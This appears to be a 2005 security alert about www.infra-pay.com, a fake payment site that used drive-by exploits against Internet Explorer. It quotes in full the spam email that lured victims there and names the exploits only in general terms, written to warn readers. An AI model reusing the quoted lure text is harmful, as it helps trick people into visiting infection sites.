Hijack Alert: www.infra-pay.com

This is one of the nastier breeds of deception on the Internet: websites which actively attempt to exploit known bugs in common programs, and thereby install various kinds of undesirable software on your computer. What kinds of software, you ask? Well, it varies, depending on the wants of the man in the Black Hat. Maybe he'll get your computer to send spam on his behalf; maybe he can use it to host child pornography or phishing scams; maybe he wants to inspect your computer for useful personal data and passwords; maybe he just wants to on-sell your computer services to some other person who will do one of these things.

Essentially, this is a hijacking attempt, but different from a vehicle hijacking in that you may not notice it has happened to you. It's generally in the hijacker's interests to be discreet about the process, otherwise you may get wise to the situation and kick him off. You may only notice that your Internet connection is very slow when he's using it to send spam, or similar. If you're lucky, your ISP will notice the suspicious activity being generated by your computer and isolate you from the rest of the Internet until you clear it up. Most ISPs don't do this: it's extra work, and most customers will feel indignant at being "cut off for no reason". But there is a reason, and being "cut off" is the best thing that can happen under the circumstances.

Enough with the introduction; now to business. I received a spam from 12.217.82.168 (12-217-82-168.client.mchsi.com) on Wed, 4 May 2005 15:27:56 -0000. This spam claimed to be from a new online payment service, and was a payment for me. The body text follows, with defanged hyperlinks for your added safety. I've also crossed out the "claim code", since it's possibly being used for tracking purposes, although I suspect it's an irrelevant distraction in this case.

You've just been sent money with Infra-Pay!
Amount: $1495.00
Memo: First part payment

To accept this payment, please go to http://www.infra-pay.com and enter your
claim code: xxxxxxxx.

If you do not wish to accept this payment, simply ignore this message and it
will automatically be canceled in 72 hours. You will also get a reminder to
claim your cash within the next 48 hours if you do not claim it now.

Infra-Pay.com is a new Internet payment system based on the newest payment
processing technologies. You will have the following options to withdraw your
money:

- Direct credit to your bank account in Australia, New Zealand or the
USA (usually takes 2 to 3 business days)
- Order a cheque (incurs a $2.50 fee)
- Order a free debit card (ATM withdrawal fees apply)
- E-mail money to someone else

To accept this payment, please go to http://www.infra-pay.com and enter your
claim code on the front page. Your claim code is xxxxxxxx.

(c) 2005 Infra-Pay.com. All rights reserved.

If your curiosity is piqued, and you go to the web site in question, you'll find a reasonably convincing mock-up of a payment processing site (so long as you don't inspect it too closely) containing a text-box into which you can enter your payment ID. What's supposed to happen when you enter something into the text box is that you get another page back which says, "Sorry, this transaction has been canceled by the sender!" and "Please ensure that your JavaScript settings are turned on, before using this option!" When I tried it out, however, there was a bug which prevented the correct page from being loaded, and I got an Apache-generated error page instead.

What you probably haven't noticed while all this is going on is that the web pages have been attempting to download various bits of software onto your computer so that the Man in the Black Hat can start to use your computer without your knowledge. So far as I can tell, this particular site is tuned for two distinct exploits: one for Internet Explorer on Windows XP with Service Pack 2; the other for slightly older versions of Windows and IE. Systems other than Microsoft Windows and Microsoft Internet Explorer appear not to be targeted. There is no attempt to phish for information beyond the "claim code" sent in the original spam.

The older exploit is the "CHM exploit", if you know what that means. The newer one (for SP2) involves a rather large amount of obfuscated Javascript and embedded OBJECT references. If you want to investigate the files (and the site is no longer available directly), I'm happy to share copies of the files for the next seven days -- email me if you want them. At the time of investigation, the web site was hosted at 216.239.12.134 (no rDNS), which WHOIS reports as allocated to "ICNT INC" in Fargo, ND, USA. Neither their WHOIS record nor their website provides an "abuse" contact, so I haven't bothered trying to tell them about it.